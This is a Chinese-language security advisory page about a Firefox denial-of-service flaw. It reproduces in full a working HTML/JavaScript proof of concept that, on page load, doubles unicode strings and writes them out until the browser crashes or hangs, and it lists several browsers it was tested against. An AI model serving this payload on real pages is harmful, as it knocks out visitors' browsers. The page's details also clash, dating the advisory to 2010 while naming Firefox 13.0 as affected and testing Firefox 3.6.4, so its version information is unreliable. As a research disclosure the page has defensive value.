发布日期：2010-05-03
更新日期：2010-05-03

受影响系统：

Mozilla Firefox 13.0

描述：

---

Firefox是Mozilla所发布的开源WEB浏览器。

Mozilla Firefox 13.0在实现上存在安全漏洞，当用户打开了包含较长unicode字符串的畸形文件后，可导致受影响软件拒绝服务。

<*来源：Dr_IDE
  
  链接：http://osvdb.org/show/osvdb/83039
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<title>Dr_IDE - All Browsers - Long Unicode DoS PoC</title>
<head>
<script>
function boom()
{
//The number of strings increases the amount of memory consumed, quicker crash where applicable.
    var longunistring1 = unescape("%u4141%u4141");
    var longunistring2 = unescape("%u4242%u4242");
    var longunistring3 = unescape("%u4343%u4343");
    var longunistring4 = unescape("%u4444%u4444");
    
    for(i=0; i <= 60 ; ++i) //This number is very sensitive. If you go far over 60 IE won't "work"
{
        longunistring1+=longunistring1;
        longunistring2+=longunistring2;
        longunistring3+=longunistring3;
        longunistring4+=longunistring4;
        document.write(longunistring1);
        document.write(longunistring2);
        document.write(longunistring3);
        document.write(longunistring4);
    }    
    document.write(longunistring1);
    document.write(longunistring2);
    document.write(longunistring3);
    document.write(longunistring4);
}
</script>
</head>
<body onLoad="boom()">
<br>Tested on Windows 7:
<br>Firefox 3.6.4     (CrashReporter)
<br>IE 8.0.7600.16385     (Hangs, must quit)
<br>Lunascape6            (Crashes with Gecko Engine)[Firefox mode]
<br>Lunascape6            (Crashes with Webkit Engine)[Safari mode]
<br>Lunascape6            (Crashes with Trident Engine)[IE mode]
<br>Opera 10.51           (Hangs, must kill)
<br>Safari 4.0.5      (Hangs, must kill)
</body>
</html>

建议：

---

厂商补丁：

Mozilla
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.mozilla.org/security/

浏览次数：2102
严重程度：0（网友投票）